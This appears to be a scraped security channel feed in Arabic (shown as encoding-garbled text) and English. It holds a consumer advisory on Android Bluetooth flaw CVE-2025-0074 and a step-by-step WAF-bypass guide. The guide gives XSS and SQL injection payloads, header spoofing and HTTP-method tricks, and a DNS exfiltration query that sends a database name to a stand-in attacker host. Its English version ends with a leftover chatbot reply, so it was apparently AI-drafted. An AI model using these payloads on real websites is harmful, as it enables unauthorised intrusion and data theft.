ุงู„ุถุญูŠู‡ ุจุฏูˆู† ุนู„ู… ู…ู†ูˆ ูˆ ุงู„ุซุบุฑู‡ ุชู…

ุชู†ุตูŠูู‡ุง ุงู†ู‡ ุญุฑุฌู‡ ( Critical )

ุทุจ ุงู„ุญู…ุฏุงู„ู„ู‡ ุงู†ุง ุฌู‡ุงุฒูŠ ุงู†ุฏุฑูˆูŠุฏ 14


ูŠุงุงุงุง ูŠุนุฒูŠุฒูŠ ูŠูˆุณูู†ูŠ ุงู‚ูˆู„ูƒ ุงู†ูˆ ุจูŠุจุฏุงุก ู…ู† ุงูˆู„

ุงู†ุฏูˆุฑูŠุฏ 14 ูˆ ุงู†ุฏุฑูˆูŠุฏ 13 ูˆ ุงู†ุฏุฑูˆูŠุฏ 12


ูˆ ุงู†ุฏูˆุฑูŠุฏ 11 ุจุณ ุงู„ุฎุจุฑ ุงู„ุญู„ูˆ ู…ุด


ุจุชุดุชุบู„ ุนู„ูŠ ุงู†ุฏูˆุฑูŠุฏ ู‚ุจู„ 11 ูŠุนู†ูŠ


ุงู†ุฏุฑูˆูŠุฏ 9 ุนุงุฏูŠ ูˆ ุงู‚ู„ ู…ู†ูˆ


ุทูŠุจ ุงู„ุญู„ ุงูŠ ุŸ

ุงู„ุญู„ :

ุชุญุฏุซ ุงุฎุฑ ุงุตุฏุงุฑ ุนู†ุฏูƒ โœ…

ุชู†ุฒู„ antivirus โœ…

ู…ุด ุชุจู‚ูŠ ูุงุชุญ ุจู„ูˆุชูˆุซ ูƒุชูŠุฑ โœ…


ุดูƒุฑุง ุนู„ูŠ ุฏุนู…ูƒู… ู„ูˆู„ุง ุฏุนู…ูƒู… ู„ูŠุง ู…ุด

ุทูˆุฑุช ุงู„ู…ุญุชูˆูŠ ูˆ ุฏุงูŠู…ุง ุจุญุงูˆู„ ุงุทูˆุฑูˆ

ุจุณุจุจ ุฏุนู…ูƒู… ูˆ ุดูƒุฑุง ๐Ÿค


ู…ุตุฏุฑ :


https://www.cve.org/CVERecord?id=CVE-2025-0074

https://vulert.com/vuln-db/CVE-2025-0074


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074


https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
โค2
As We Explained iOS, Now It's Android's Turn!

โš ๏ธ Two Warnings:

1. The channel is not responsible for any misuse of this information.


2. All content is copyrighted. Contact us for permissions.




---

๐Ÿ“Œ Todayโ€™s Topic: A Unique CVE!

A recently discovered zero-day vulnerability:

CVE-2025-0074

๐Ÿ“… Date of Discovery: December 13, 2024
๐Ÿ“… Security Patch Released: March 3, 2025 ๐Ÿ’€


---

๐Ÿ”ฅ What Does This CVE Do?

This vulnerability exploits Bluetooth in a completely silent wayโ€”
๐Ÿšซ No user permission required
๐Ÿšซ No additional software needed
๐Ÿšซ No special privileges required

๐Ÿคฏ So, someone can exploit this CVE on my device without me knowing?

โœ” Yes! And it allows Remote Code Execution (RCE). ๐Ÿ˜


---

๐Ÿ› ๏ธ How It Works

The attack is based on a Use-After-Free (UAF) vulnerability,
which allows an attacker to inject and execute malicious code (malware) on the victimโ€™s device without their knowledge.

๐Ÿšจ Severity Level: Critical


---

๐Ÿ“ฑ Affected Devices

Bad news: ๐Ÿ˜ข

Affects Android 11, 12, 13, and 14.


Good news: ๐Ÿ˜ƒ

Does NOT affect Android 9 and lower.



---

โœ… How to Protect Yourself?

1๏ธโƒฃ Update to the latest security patch โœ…
2๏ธโƒฃ Use a trusted antivirus โœ…
3๏ธโƒฃ Keep Bluetooth disabled when not in use โœ…


---

๐Ÿ’ก Thanks for your support! Your engagement helps me improve the content every day. Stay safe! ๐Ÿค


Source :

https://www.cve.org/CVERecord?id=CVE-2025-0074

https://vulert.com/vuln-db/CVE-2025-0074


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074


https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
โค2
ุชุนุงู„ูˆ ู†ุชูƒู„ู… ุนู† ู…ูˆุถูˆุน ู…ู‡ู… ุฌุฏุง ูˆ ุงู„ูŠ

ู‡ูˆ ุงุฒุงูŠ ู†ุนู…ู„ bypass ู„ูŠ

waf ( web application firewall )

ุชุญุฐูŠุฑ :

1 : ุงู„ู‚ู†ุงู‡ ุบูŠุฑ ู…ุณุคูˆู„ู‡ ุนู† ุงูŠ ูุนู„ ุฎุงุฑุฌ ู„ุงุทุงุฑ ุงู„ุชุนู„ูŠู…ูŠ

2 : ู…ู…ู†ูˆุน ู†ุดุฑ ุงู„ู…ู‚ุงู„ ุฏูˆู† ุฐูƒุฑ ุงุณู… ุงู„ู‚ุงู„ ูŠูƒู…ู† ู†ุดุฑ ุงู„ู…ุนู„ูˆู…ู‡ ูˆู„ูƒู† ู„ุง ูŠู…ูƒู† ู†ุดุฑ ุงู„ูƒุชุงุจู‡ ุจุญุฏ ุฐุงุชู‡ุง ุงู„ูŠ ุจ ุงุฐู† ู…ู† ุตุงุญุจ ู‚ู†ุงู‡


ู†ูุชุฑุถ ุนู†ุฏู†ุง ุณูŠู†ุงุฑูŠูˆ ู„ ูˆุงุญุฏ ู†ุณู…ูŠ

ุญู…ุงุตู‡ ุญู…ุงุตู‡ ูƒุงู† ู‚ุนุฏ ูŠู‡ู†ุช ูˆู„ู‚ูŠ ุซุบุฑู‡

sql injection

ุดุฑุญ ุณุฑูŠุน : sql injection ุฏูŠ ุจุชุญู‚ู†

ุจุงูŠู„ูˆุฏ ููŠ ุงูƒูˆุงุฏ sql ุจุชุงุน ู…ูˆู‚ุน ุนุดุงู†

ุชุณุญุจ ุฏุงุชุง ุฎุงุตู‡

ุงู„ู…ู‡ู… ุญู…ุงุตู‡ ู„ู…ุง ุฌู‡ ูŠุณุชุบู„ ุซุบุฑู‡ ู…ุนุฑูุด

ู…ุนุฑูุด ูŠุนู…ู„ู‡ุง exploit ุจุณุจุจ waf

ุทูŠุจ ุญู…ุงุตู‡ ูŠุนู…ู„ ุงูŠ ุŸ

ุงู†ุง ู‡ู‚ูˆู„ูƒ โœจ

ุงูˆู„ ุญุงุฌู‡ : ุญู…ุงุตู‡ ูŠุฌุฑุจ ูŠู„ุนุจ ููŠ

ุจุงูŠู„ูˆุฏ ูŠุนู…ู„ encode ุจุฎุชุตุงุฑ

ุทุจ ุฒูŠ ุงูŠ ูŠุง ุณุจุงูŠุฏุฑ ๐Ÿค”

ุฒูŠ ุจุงูŠู„ูˆุฏ xss

<script>alert(1)</script>

ู†ูุณูˆ ุจุนุฏ ู…ุง ุชุนู…ู„ encode url

%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E

ุจุงูŠู„ูˆุฏ ูˆู‚ุชู‡ุง ุจูŠุดุชุบู„ ุนุงุฏูŠ ูƒู†ูˆ ู†ูุณ ู„ุงูˆู„

ุทูŠุจ ู†ูุฑุถ ู…ุด ุงุดุชุบู„ ๐Ÿค”

ุชุงู†ูŠ ุฎุทูˆู‡ :

ุชู„ุงุนุจ ููŠ headers

ุงูŠ ุงู„ุชู„ุงุนุจ ููŠ ุงู„ู‡ูŠุฏุฑ ุฏูŠ ุŸ

ุดูˆู ุชู„ุงุนุจ ููŠ ุงู„ู‡ูŠุฏุฑ ุจุชูƒูˆู† ุงู†ูƒ ุชุญุงูˆู„

ุชุบูŠุฑ ุญู…ุงูŠู‡ ุฒูŠ X-Original-URL

ุทูŠุจ ุงุฒุงูŠ ๐Ÿค”

ุจุณูŠุทู‡

GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

ุทูŠุจ ู†ูุฑุถ ุงู†ู‡ุง ู…ุด ุงุดุชุบู„ุช ู†ุนู…ู„ ุงูŠ ุŸ

ู†ูŠุฌูŠ ู„ูŠ ุฎุทูˆู‡ ุชุงู„ุชู‡ :

ู†ุฌุฑุจ ู†ุนุฏู„ ู HTTP ู…ู…ูƒู† ู†ุฎู„ูŠ

TRACE
ูˆ ูŠุดุชุบู„ ู…ุนุงู†ุง

ู…ุซุงู„

HEAD /admin HTTP/1.1
ุงูˆ
TRACE /admin HTTP/1.1

ุจุฏู„ get ุงูˆ post

ุทูŠุจ ู†ูุชุฑุถ ู…ุด ุงุดุชุบู„ุช ๐Ÿค”

ู†ูŠุฌูŠ ู„ูŠ ุทุฑูŠู‚ู‡ ุงู„ุฑุงุจุนู‡ :

ุงู„ุฎุทูˆู‡ ุฏูŠ ุดุจู‡ ุงู„ูŠ ูุงุชุช ูˆู„ูƒู† ุงู†ุช

ู‡ุชุฌุฑุจ ุชุนุฏู„ ุงู„ู…ู„ู ูŠูƒูˆู† ู…ุซู„ุง xml

ู…ุซุงู„ :
/admin.json

ุทูŠุจ ู†ูุชุฑุถ ู…ุด ุงุดุชุบู„ุช ๐Ÿ˜‚๐Ÿค”

ู‡ู‚ูˆู„ูƒ ุจุฑุฏูˆ ููŠ ุฎุทูˆู‡ ุฎุงู…ุณู‡ ๐Ÿ˜‚

ุงู„ุฎุทูˆู‡ ุงู„ุฎุงู…ุณู‡ :

ูˆ ุฏูŠ ุจุณูŠุทู‡ ููŠ waf ุจูŠูƒูˆู† ู…ุด ุนุงุฑู

ูŠูุฑู‚ ุจูŠู† ุงู„ุญุฑูˆู ุงู„ุตุบูŠุฑู‡ ู…ู† ุญุฑูˆู
ุงู„ูƒุจูŠุฑ

ุจุชู‡ุฒุฑ ูŠุง ุณุจุงูŠุฏุฑ ูŠุนู†ูŠ waf ุทู„ุน ุบุจูŠ ูƒุฏ

ู‡ู‚ูˆู„ูƒ ุงูŠูˆ ู…ุซุงู„

<script>alert(1)</script>

ุฏุง ูƒูˆุฏ xss ุนุงุฏูŠ

<Script>alert(1)</Script>

ู‡ูˆ ู†ูุณ ุงู„ูƒูˆุฏ ุจู†ูุณ ุงู„ุทุฑูŠู‚ู‡

ุทูŠุจ ู†ูุชุฑุถ ู…ุด ุงุดุชุบู„ุช ๐Ÿค”

ู‡ู‚ูˆู„ูƒ ููŠ ุทุฑูŠู‚ู‡ ุณุงุฏุณู‡ :


ุงู„ุทุฑูŠู‚ู‡ ุฏูŠ ู…ู…ูƒู† ุชุชู„ุงุนุจ ู dns ุฎุงุต

ุจู„ ู…ูˆู‚ุน

ู…ุซุงู„ :

SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',database()));

ุฏุง ุจุงูŠู„ูˆุฏ ุนุงุฏูŠ

SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);

ุจุนุฏ ุชุนุฏูŠู„

ุทูŠุจ ู„ูˆ ู†ุฌุญุช ุŸ

ุงุฎุฑ ุทุฑูŠู‚ู‡ ูˆ ู‡ูŠุง ุงู„ุณุงุจุนู‡ :

ุดูˆู ุงุตุฏุงุฑ waf ูˆ ุฏูˆุฑ ุนู„ูŠ cve ู„ูŠ

ูˆ ุฌุฑุจ cve ูƒู„ู‡ู… ู„ุญุฏ ู…ุง ุชู‚ุฏุฑ ุชุนู…ู„ bypass

ุดูƒุฑุง ู„ ู‚ุฑุงุฆู‡ ุงู„ู…ู‚ุงู„ ุญุงูˆู„ุช ุงูƒูˆู† ุฎููŠู ูˆ ู…ู„ู… ุจูƒู„ ุดุฆ ๐Ÿค
โค1
Bypassing WAF (Web Application Firewall): A Practical Guide

Disclaimer:

1. This article is for educational purposes only. The author is not responsible for any misuse of the information provided.


2. You may share the knowledge but do not copy this article without permission from the author.




---

Introduction

Let's imagine a scenario where a hacker, whom weโ€™ll call Hamasah, discovers a SQL Injection vulnerability on a target website.

Quick Explanation:

SQL Injection allows attackers to inject malicious SQL queries into an applicationโ€™s database to extract sensitive information.

However, when Hamasah attempts to exploit the vulnerability, the attack gets blocked by a WAF (Web Application Firewall).

So, what should Hamasah do? ๐Ÿค”

Let's explore different WAF bypass techniques step by step.


---

1. Encoding the Payload

One of the simplest ways to bypass a WAF is by encoding the payload so that it doesn't match the WAFโ€™s predefined signatures.

Example: XSS Encoding

Original Payload:

<script>alert(1)</script>

Encoded Payload (URL Encoding):

%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E


In this case, the WAF might fail to detect the encoded payload while the browser will still interpret and execute it normally.


---

2. Header Manipulation

Some WAFs rely on analyzing request headers to detect malicious traffic. Modifying headers can help bypass them.

Example: Spoofing X-Forwarded-For

Some WAFs only block specific IPs. You can try bypassing it by adding a X-Forwarded-For header to appear as a trusted source.

GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

If the WAF is improperly configured, it might think the request is coming from the localhost and allow it through.


---

3. HTTP Method Manipulation

Instead of using standard HTTP methods like GET or POST, trying other methods such as HEAD or TRACE might work.

Example:

HEAD /admin HTTP/1.1

or

TRACE /admin HTTP/1.1

Some WAFs do not inspect these methods as strictly as GET/POST.


---

4. Switching to Alternative Data Formats

If the WAF filters traditional form-based requests, try sending data in JSON or XML format instead.

Example:

Instead of:

username=admin' OR 1=1 --

Try sending it as JSON:

{ "username": "admin' OR 1=1 --", "password": "password" }

Some WAFs are not designed to analyze JSON requests properly, which can allow the payload to bypass security.


---

5. Case Manipulation

Many WAFs perform case-sensitive filtering, so modifying the letter case can sometimes bypass them.

Example: XSS Attack Case Manipulation

Normal Payload:

<script>alert(1)</script>

Bypass Attempt:

<Script>alert(1)</Script>


If the WAF only blocks lowercase "script", the uppercase version might go through.


---

6. Exploiting DNS-based Exfiltration

Some WAFs block direct responses but still allow outbound connections, which can be used to extract data.

Example:

Instead of trying to display sensitive data on the screen, you can send it to an external server via DNS requests:

SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\', database()));

or

SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);

If the WAF does not filter outbound traffic, the database information might be leaked via DNS requests.


---

7. Finding WAF Vulnerabilities (CVE Exploits)

The ultimate method for bypassing a WAF is to find vulnerabilities in the WAF itself.

Steps:

1. Identify the WAF using tools like WAFW00F:

wafw00f http://target.com


2. Search for CVEs related to that WAF.


3. Exploit known vulnerabilities to bypass or disable the WAF.



For example, if the target is using an outdated version of a cloud-based WAF, you might find a known CVE that allows bypassing its protection.


---

Conclusion

WAF bypassing is an ongoing challenge that requires creativity and persistence. Combining multiple techniques often yields the best results.

If one method doesn't work, try another approachโ€”because thereโ€™s always a way!

Would you like me to help you turn this into a video script or add more advanced techniques?
โค1
ุชุญุจ ู…ุญุชูˆูŠ ุจูƒุฑู‡ ูŠูƒูˆู† ุงูŠ : What do you want the content to be
Anonymous Poll
63%
Red team : ูุฑูŠู‚ ุงู„ู‡ุฌูˆู…
17%
Blue team : ูุฑูŠู‚ ุงู„ุฏูุงุน
20%
Ai : ุฐูƒุงุก ุงุตุทู†ุงุนูŠ
โค3